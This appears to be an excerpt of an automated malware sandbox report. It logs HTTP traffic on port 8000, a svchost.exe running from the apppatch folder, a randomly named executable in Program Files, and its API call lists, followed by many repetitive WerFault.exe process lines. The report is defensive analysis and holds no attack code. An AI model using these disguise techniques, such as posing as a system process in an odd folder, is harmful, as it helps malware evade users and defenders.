Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 53550 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 53550
Source: unknownNetwork traffic detected: HTTP traffic on port 53553 -> 8000
Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 53553
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,2_2_02C7C380
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7C069
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_02C7BE40
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C78F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,2_2_02C78F20
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C7BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,2_2_02C7BDD0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exeCode function: 5_2_0141C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_0141C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_0141C380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_0141BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_0141BDD0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_01418F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_01418F20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 5_2_0141BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0141BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_0138C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_0138C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_0138C380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_0138BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_0138BDD0
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_01388F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_01388F20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 6_2_0138BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_0138BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_0321C380 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,10_2_0321C380
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_0321C069 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321C069
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_03218F20 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,10_2_03218F20
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_0321BE40 WaitForSingleObject,GetWindow,IsWindow,IsIconic,GetWindowInfo,GetWindowInfo,GetAncestor,GetWindow,IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,10_2_0321BE40
Source: C:\Program Files (x86)\xDrgTMJuRxVJNlsKAQzZqeXRRQooYIYjzVbeTzZbQrvnhHGsWkvQsgiywoCstLAARfLpD\nPtwtzGyOdAtB.exe Code function: 10_2_0321BDD0 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,10_2_0321BDD0
Source: C:\Windows\apppatch\svchost.exe Code function: 2_2_02C844F0 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02C844F0
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
